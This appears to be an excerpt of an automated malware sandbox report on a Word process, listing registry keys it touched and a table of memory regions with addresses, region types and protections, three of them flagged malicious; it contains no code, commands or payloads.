HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\72F4A
72F4A
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 727 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
790000
heap
page read and write
malicious
7E0000
heap
page read and write
malicious
2EB0000
heap
page read and write
malicious
9490000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
261658F7000
heap
page read and write
8760000
trusted library allocation
page read and write
95A0000
trusted library allocation
page read and write
A517000
trusted library allocation
page read and write
AB4000
heap
page read and write
5FB7000
trusted library allocation
page read and write
9A9D000
unkown
page read and write
52D3000
heap
page read and write
5591000
trusted library allocation
page read and write
5B86000
trusted library allocation
page read and write
26160113000
heap
page read and write
77A0000
trusted library allocation
page read and write
9990000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
86F5000
trusted library allocation
page read and write
261658FF000
heap
page read and write
A4FA000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
A4A3000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
26160000000
heap
page read and write
3150000
trusted library allocation
page read and write
261656B0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
97C5000
unkown
page read and write
8750000
trusted library allocation
page read and write
261656B4000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
857000
heap
page read and write
21F7E220000
heap
page read and write
A4C0000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
8700000
unkown
page read and write
9A30000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
21F7E458000
heap
page read and write
7AC0000
trusted library allocation
page read and write
1CB89800000
heap
page read and write
6A60000
direct allocation
page read and write
9560000
trusted library allocation
page read and write
261658A1000
heap
page read and write
2687AA3C000
heap
page read and write
5510000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9945000
trusted library allocation
page read and write
A6B8000
trusted library allocation
page read and write
69D4000
direct allocation
page read and write
AF833FB000
stack
page read and write
96D0000
trusted library allocation
page read and write
9868E7F000
stack
page read and write
21F7E1B0000
heap
page read and write
7AF0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
7E87FFF000
stack
page read and write
9660000
trusted library allocation
page read and write
9666000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
EE4357F000
stack
page read and write
94A0000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
885000
heap
page read and write
9620000
trusted library allocation
page read and write
52E8000
heap
page read and write
1CB89A13000
heap
page read and write
96E0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
4790000
trusted library allocation
page read and write
659D000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
B082000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
7B92000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
97F5000
unkown
page read and write
A650000
trusted library allocation
page read and write
9497000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
77B8000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A510000
trusted library allocation
page execute and read and write
9700000
trusted library allocation
page read and write
C536000
trusted library allocation
page read and write
C47F000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
207E9ABF000
heap
page read and write
94A0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
86F0000
unkown
page read and write
B40000
trusted library allocation
page read and write
72E0000
direct allocation
page read and write
98CF000
trusted library allocation
page read and write
86F5000
unkown
page read and write
5F3A000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
7B00000
trusted library allocation
page read and write
4F7F000
stack
page read and write
A420000
trusted library allocation
page read and write
9525000
unkown
page read and write
261656A0000
trusted library allocation
page read and write
589F000
stack
page read and write
75A0000
trusted library allocation
page read and write
94A5000
trusted library allocation
page read and write
5470000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
26165740000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
852000
heap
page read and write
9640000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
B2A0000
trusted library allocation
page read and write
2616583B000
heap
page read and write
77B0000
trusted library allocation
page read and write
28A08A00000
heap
page read and write
A630000
trusted library allocation
page read and write
7BB0000
unkown
page read and write
964667C000
stack
page read and write
52A0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9570000
trusted library allocation
page read and write
8700000
unkown
page read and write
A500000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
580000
heap
page read and write
97C0000
trusted library allocation
page read and write
26161120000
trusted library section
page readonly
290C3F00000
heap
page read and write
96F5000
unkown
page read and write
52A9000
heap
page read and write
A4D0000
trusted library allocation
page read and write
5330000
trusted library section
page read and write
96E0000
trusted library allocation
page read and write
7B00000
trusted library allocation
page read and write
1EE91C00000
heap
page read and write
8700000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
C143000
trusted library allocation
page read and write
9975000
unkown
page read and write
96D0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
8740000
trusted library allocation
page read and write
AF834FE000
stack
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
927F57E000
stack
page read and write
A4C0000
trusted library allocation
page read and write
9653000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
6046000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
52C6000
heap
page read and write
2615FFD0000
trusted library allocation
page read and write
B3F0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
9970000
unkown
page read and write
6ACC000
direct allocation
page read and write
1CB89A61000
heap
page read and write
B2A0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
1828727F000
heap
page read and write
77A0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
7870000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
B450000
trusted library allocation
page read and write
7B96000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
207E9AD0000
heap
page read and write
54F0000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
1828725B000
heap
page read and write
26160076000
heap
page read and write
8735000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
7B90000
unkown
page read and write
77A0000
trusted library allocation
page read and write
88F000
heap
page read and write
96F0000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
3F0000
heap
page read and write
97F0000
trusted library allocation
page read and write
A630000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
4D1E000
stack
page read and write
9480000
unkown
page read and write
9690000
trusted library allocation
page read and write
8705000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
8744000
unkown
page read and write
6C0000
heap
page read and write
5C00000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
182870F0000
heap
page read and write
2DD0000
trusted library allocation
page read and write
97E4000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
7B9F000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
1EE91BB0000
trusted library allocation
page read and write
84D000
heap
page read and write
2687AB00000
heap
page read and write
A400000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
94B6000
trusted library allocation
page read and write
8611000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
1CB89A62000
heap
page read and write
9720000
trusted library allocation
page read and write
207E9A88000
heap
page read and write
9A40000
trusted library allocation
page read and write
A505000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
1CB89A46000
heap
page read and write
A4D0000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
9480000
unkown
page read and write
261614D0000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
A4E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page execute and read and write
28535802000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
671000
stack
page read and write
5330000
trusted library allocation
page read and write
1CB89A67000
heap
page read and write
B290000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
86F0000
unkown
page read and write
9710000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
207EA402000
heap
page read and write
A4D0000
trusted library allocation
page read and write
B490000
trusted library allocation
page execute and read and write
9470000
trusted library allocation
page read and write
8735000
trusted library allocation
page read and write
B460000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
8766000
trusted library allocation
page read and write
523E000
stack
page read and write
9525000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
1DDDC23D000
heap
page read and write
1CB89A7C000
heap
page read and write
5330000
trusted library allocation
page read and write
6ABC000
direct allocation
page read and write
96D0000
trusted library allocation
page read and write
2853505F000
heap
page read and write
964657C000
stack
page read and write
9610000
trusted library allocation
page read and write
18287313000
heap
page read and write
28A08840000
heap
page read and write
A4C0000
trusted library allocation
page read and write
9477000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
A5B000
heap
page read and write
97E0000
trusted library allocation
page read and write
45A0000
heap
page read and write
3150000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
475D000
stack
page read and write
96C0000
trusted library allocation
page read and write
26160815000
heap
page read and write
18287229000
heap
page read and write
9660000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
1CB89A7F000
heap
page read and write
9B1E000
unkown
page read and write
C571000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
98BF000
trusted library allocation
page read and write
A4C0000
trusted library allocation
page read and write
20148E79000
heap
page read and write
8730000
unkown
page read and write
96B0000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
26160918000
heap
page read and write
9480000
trusted library allocation
page read and write
ACC000
heap
page read and write
A9A000
heap
page read and write
964647F000
stack
page read and write
26165887000
heap
page read and write
9485000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
AF8397D000
stack
page read and write
EE431FB000
stack
page read and write
9A20000
unkown
page read and write
94A0000
trusted library allocation
page read and write
986937F000
stack
page read and write
290C4002000
heap
page read and write
9610000
trusted library allocation
page read and write
9940000
unkown
page read and write
9670000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
81E000
stack
page read and write
BD32F7F000
stack
page read and write
C099000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
37C000
stack
page read and write
96F0000
trusted library allocation
page read and write
C10000
heap
page read and write
290C4013000
heap
page read and write
26165560000
trusted library allocation
page read and write
B280000
trusted library allocation
page read and write
5316000
heap
page read and write
9800000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
1EE91C02000
heap
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A440000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
50C0000
trusted library allocation
page read and write
C49F000
trusted library allocation
page read and write
C53F000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
4800000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
47A1000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
AC8000
heap
page read and write
1DDDC200000
heap
page read and write
8760000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
18287221000
heap
page read and write
32AE000
stack
page read and write
9600000
trusted library allocation
page read and write
A4D5000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
3030000
heap
page read and write
1CB89A68000
heap
page read and write
85D0000
direct allocation
page read and write
96E0000
trusted library allocation
page read and write
9480000
unkown
page read and write
1DDDC248000
heap
page read and write
94A0000
trusted library allocation
page read and write
C477000
trusted library allocation
page read and write
51F9000
stack
page read and write
96FE000
trusted library allocation
page read and write
97CA000
trusted library allocation
page read and write
A4F0000
unkown
page read and write
8700000
unkown
page read and write
18287A02000
trusted library allocation
page read and write
530000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
5944000
trusted library allocation
page read and write
585F000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
845000
heap
page read and write
2615FFE0000
trusted library section
page read and write
9520000
trusted library allocation
page read and write
28A08A3B000
heap
page read and write
84D000
heap
page read and write
9880000
trusted library allocation
page read and write
1CB89A60000
heap
page read and write
C08D000
trusted library allocation
page read and write
87EF000
stack
page read and write
A640000
trusted library allocation
page read and write
B280000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
1CB89A5C000
heap
page read and write
97F0000
trusted library allocation
page read and write
1CB89A3B000
heap
page read and write
58C000
stack
page read and write
A640000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
89C000
heap
page read and write
7AF0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
A4C0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page execute and read and write
9480000
trusted library allocation
page read and write
643F000
stack
page read and write
9710000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
B2B0000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9488000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
EE43DFE000
stack
page read and write
8720000
trusted library allocation
page read and write
290C4113000
heap
page read and write
9620000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
5316000
heap
page read and write
97F0000
trusted library allocation
page read and write
51C6000
direct allocation
page read and write
5110000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
26165670000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
B09E000
trusted library allocation
page read and write
7AF0000
trusted library allocation
page read and write
290C405D000
heap
page read and write
99A0000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
9641000
trusted library allocation
page read and write
2687AA28000
heap
page read and write
509D000
trusted library allocation
page execute and read and write
A510000
trusted library allocation
page read and write
565E000
stack
page read and write
A530000
trusted library allocation
page read and write
28A08B13000
heap
page read and write
5570000
trusted library allocation
page read and write
9480000
unkown
page read and write
896000
heap
page read and write
9660000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
B2A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
2616008A000
heap
page read and write
B390000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9680000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
C488000
trusted library allocation
page read and write
7AAC000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
858000
heap
page read and write
96D0000
trusted library allocation
page execute and read and write
5C59000
trusted library allocation
page read and write
A469000
trusted library allocation
page read and write
1CB89A5A000
heap
page read and write
8700000
trusted library allocation
page read and write
69A0000
direct allocation
page read and write
9810000
unkown
page read and write
9600000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
52E6000
heap
page read and write
96FA000
trusted library allocation
page read and write
7B90000
unkown
page read and write
A4F0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
888000
heap
page read and write
1828728A000
heap
page read and write
5450000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
5CE1000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
7106000
direct allocation
page read and write
5330000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
EE43AFE000
stack
page read and write
9580000
trusted library allocation
page read and write
86F6000
trusted library allocation
page read and write
3137000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
C017000
trusted library allocation
page read and write
5200000
direct allocation
page read and write
A400000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
9490000
unkown
page read and write
525E000
stack
page read and write
21F7E400000
heap
page read and write
A91000
heap
page read and write
A2E000
stack
page read and write
5530000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
5F43000
trusted library allocation
page read and write
8700000
unkown
page read and write
A90000
heap
page read and write
A4F0000
trusted library allocation
page read and write
EE43BFA000
stack
page read and write
75AD000
trusted library allocation
page read and write
207E9940000
heap
page read and write
1828725F000
heap
page read and write
97E0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
7B00000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
896000
heap
page read and write
A4F0000
trusted library allocation
page read and write
6026000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
E26307B000
stack
page read and write
5510000
trusted library allocation
page read and write
5450000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
3A0000
remote allocation
page read and write
96E0000
trusted library allocation
page read and write
8737000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
A530000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
7636000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
9495000
trusted library allocation
page read and write
7111000
direct allocation
page read and write
97F0000
unkown
page read and write
8700000
trusted library allocation
page read and write
C4F6000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
A40F000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
9486000
trusted library allocation
page read and write
B320000
trusted library allocation
page read and write
9480000
unkown
page read and write
9660000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
A4A0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
5570000
trusted library allocation
page read and write
BD3307E000
stack
page read and write
95F0000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
5C1E000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
A5D000
heap
page read and write
26165780000
trusted library allocation
page read and write
1CB89A7B000
heap
page read and write
9596000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
A44D000
trusted library allocation
page read and write
C57A000
trusted library allocation
page read and write
20148E64000
heap
page read and write
20148F00000
heap
page read and write
9720000
trusted library allocation
page read and write
988D000
stack
page read and write
9660000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9480000
unkown
page read and write
7A8C000
stack
page read and write
8730000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
47D4000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
290C4000000
heap
page read and write
96F0000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
20148CC0000
heap
page read and write
9600000
trusted library allocation
page read and write
207E98D0000
heap
page read and write
5BF0000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
290C404A000
heap
page read and write
A4D0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
53A0000
heap
page read and write
450E000
stack
page read and write
A464000
trusted library allocation
page read and write
410000
heap
page read and write
2DB0000
trusted library allocation
page read and write
3A0000
remote allocation
page read and write
A480000
trusted library allocation
page execute and read and write
9700000
trusted library allocation
page read and write
28A08B02000
heap
page read and write
A460000
trusted library allocation
page read and write
55CA000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
A5B0000
trusted library allocation
page read and write
1CB89A6A000
heap
page read and write
A450000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
261614C0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
5CD9000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
891000
heap
page read and write
96D0000
trusted library allocation
page read and write
5126000
heap
page read and write
75B0000
trusted library allocation
page read and write
9ADE000
unkown
page read and write
3130000
trusted library allocation
page read and write
9485000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
346B000
stack
page read and write
95F0000
trusted library allocation
page read and write
261600FC000
heap
page read and write
A500000
trusted library allocation
page read and write
A6B000
heap
page read and write
261658EA000
heap
page read and write
A4F0000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
54D0000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
5B74000
trusted library allocation
page read and write
97F0000
unkown
page read and write
A460000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9704000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
18287300000
heap
page read and write
C445000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
859000
heap
page read and write
96F0000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
7120000
direct allocation
page read and write
28A08A6F000
heap
page read and write
2DB0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9645000
trusted library allocation
page read and write
A70000
heap
page read and write
9600000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
52E9000
heap
page read and write
5220000
direct allocation
page read and write
A4D0000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
6922000
direct allocation
page read and write
9640000
trusted library allocation
page read and write
290C3FF0000
remote allocation
page read and write
9610000
unkown
page read and write
A4E0000
trusted library allocation
page execute and read and write
84C000
heap
page read and write
20148CD0000
heap
page read and write
7B10000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9798000
trusted library allocation
page read and write
A3F0000
trusted library allocation
page read and write
1CB89A00000
heap
page read and write
5560000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9480000
unkown
page read and write
99C0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
8653000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
7AF4000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
26165904000
heap
page read and write
9620000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A510000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
9719000
trusted library allocation
page read and write
1CB89A75000
heap
page read and write
1DDDC0E0000
heap
page read and write
7B95000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
2EB8000
heap
page read and write
5FC0000
trusted library allocation
page read and write
50AD000
trusted library allocation
page execute and read and write
75F0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
72C0000
direct allocation
page read and write
34EF000
stack
page read and write
A4E0000
trusted library allocation
page read and write
20148E40000
heap
page read and write
986927E000
stack
page read and write
9620000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
28534DC0000
heap
page read and write
BD3337F000
stack
page read and write
9970000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
C06E000
trusted library allocation
page read and write
590000
trusted library allocation
page read and write
2DCE000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
A505000
trusted library allocation
page read and write
786E000
stack
page read and write
89B000
heap
page read and write
517F000
stack
page read and write
9890000
trusted library allocation
page read and write
A4D8000
trusted library allocation
page read and write
A4B0000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
9868C7F000
stack
page read and write
9610000
trusted library allocation
page read and write
89B000
heap
page read and write
1DDDC239000
heap
page read and write
74E000
stack
page read and write
28535102000
heap
page read and write
94A0000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
83D75CB000
stack
page read and write
8710000
trusted library allocation
page execute and read and write
99D0000
unkown
page read and write
86F0000
trusted library allocation
page read and write
95D0000
unkown
page read and write
26165550000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
97B7000
unkown
page read and write
C556000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
62E6000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
97BE000
stack
page read and write
9A30000
trusted library allocation
page read and write
9A30000
unkown
page read and write
87AE000
stack
page read and write
A640000
trusted library allocation
page read and write
A51C000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
99C4000
trusted library allocation
page read and write
A3F0000
